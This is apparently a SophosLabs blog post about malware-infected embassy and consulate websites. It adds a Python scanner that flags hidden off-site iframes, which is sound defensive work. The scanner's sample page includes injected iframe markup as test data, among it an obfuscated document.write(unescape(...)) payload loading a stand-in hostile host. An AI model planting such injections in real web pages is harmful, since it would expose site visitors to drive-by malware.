YME&C: Yet More Embassies and Consulates

Previously, SophosLabs has spoken about Embassy and Consulate websites being infected:

Over the past few weeks SophosLabs has seen three more Embassy/Consulate sites join this list:

  • Pakistan Consulate in Houston, Texas
  • Embassy Republic of Iraq in Tehran, Iran
  • Embassy Republic of Sudan in Tehran, Iran

Are embassies being targeted?

No. They are just a microcosm of the Internet.

There are ~200 countries in the world, and each of those has roughly one Embassy/Consulate/High Commission in each of the other countries.

So that makes roughly 200 × 200 = 40 000 websites.

7/ 40 000 = 0.0175%

The above rough working suggests that the proportion of Embassy/Consulate websites infected is approximately 0.02%.

What malware is on these sites?

Mal/Iframe-F is the culprit for the Pakistani and Sudanese sites and Mal/ObfJS-BI for the Iraqi site.

Mal/ObfJS-BI is obfuscated JavaScript that redirects to an iframe referencing an IP address registered in St. Petersburg, Russia. Mal/Iframe-F references two distinct domains, one a .CN and the other a .BIZ (registered in Russia).
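Both detections boil down to the same artefact: an iframe the site owner never put there, usually sized to zero pixels or hidden by CSS, and pointing off-site (to a bare IP or a domain with no relation to the site). The script below is an added example, not SophosLabs' detection logic, showing how a webmaster could scan their own page for that pattern. It covers both the static injected-iframe case (the Mal/Iframe-F style) and the case where the iframe is only written at runtime via `document.write(unescape(...))`, which it handles by decoding `unescape()` string literals inside `<script>` blocks and scanning the result. The sample page, the hostnames, the `192.0.2.1` address and the `site_host` value are all constructed for the example; the real IP and domains from the post are not reproduced.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Constructed sample page (not a real infected site). It contains one legitimate,
# visible iframe, one statically injected zero-size iframe pointing at a bare IP
# (192.0.2.1 is a documentation address, used here as a stand-in), and one
# iframe that only appears after a document.write(unescape(...)) is evaluated.
SAMPLE_HTML = """<html><body>
<h1>Consulate of Exampleland</h1>
<iframe src="https://www.example.org/map" width="600" height="400"></iframe>
<iframe src="http://192.0.2.1/" width="0" height="0" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fhostile.example.net%2Fx.php%22%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E'));</script>
</body></html>"""

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
# Matches the string literal handed to JavaScript's unescape(): the usual
# wrapper for a percent-encoded "<iframe ...>" written into the page at runtime.
UNESCAPE_ARG = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)


class PageCollector(HTMLParser):
    """Collects iframe attribute dicts and the text of every <script> block."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self.scripts = []
        self._script_buf = None

    def handle_starttag(self, tag, attrs):
        tag = tag.lower()
        if tag == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})
        elif tag == "script":
            self._script_buf = []

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._script_buf is not None:
            self.scripts.append("".join(self._script_buf))
            self._script_buf = None

    def handle_data(self, data):
        if self._script_buf is not None:
            self._script_buf.append(data)


def collect_iframes(html):
    """Return (attrs, origin) for iframes present statically or via unescape() in scripts."""
    page = PageCollector()
    page.feed(html)
    frames = [(attrs, "static") for attrs in page.iframes]
    for script in page.scripts:
        for _quote, encoded in UNESCAPE_ARG.findall(script):
            decoded = unquote(encoded)
            if "<iframe" in decoded.lower():
                inner = PageCollector()
                inner.feed(decoded)
                frames.extend((attrs, "unescape() in script") for attrs in inner.iframes)
    return frames


def is_tiny(value):
    """True for width/height of 0 or 1 pixel (leading number, unit ignored)."""
    m = re.match(r"^\s*(\d+)", value or "")
    return bool(m) and int(m.group(1)) <= 1


def suspicious_iframes(html, site_host):
    """Flag off-site iframes that are also hidden, tiny, or pointing at a bare IP.

    site_host is the hostname the page legitimately lives on; any iframe whose
    src host differs is 'off-site'. An off-site frame alone is not enough (sites
    embed maps and videos); it must also show a concealment signal.
    """
    findings = []
    for attrs, origin in collect_iframes(html):
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        reasons = []
        if host and host != site_host.lower():
            reasons.append("off-site src")
        if IPV4.match(host):
            reasons.append("bare IP host")
        if is_tiny(attrs.get("width")) or is_tiny(attrs.get("height")):
            reasons.append("zero/one-pixel frame")
        if HIDDEN_STYLE.search(attrs.get("style", "")):
            reasons.append("hidden via CSS")
        if "off-site src" in reasons and len(reasons) > 1:
            findings.append({"src": src, "via": origin, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in suspicious_iframes(SAMPLE_HTML, "consulate.example"):
        print(finding["src"], "|", finding["via"], "|", ", ".join(finding["reasons"]))
```

Run against the constructed page it reports the zero-size frame to the bare IP and the frame recovered from the `unescape()` literal, and ignores the visible map embed. Real obfuscation goes well beyond a single `unescape()` call (string splitting, `eval` of computed strings, `fromCharCode`), so for anything more elaborate the page should be rendered in an instrumented browser and the live DOM inspected rather than the static HTML.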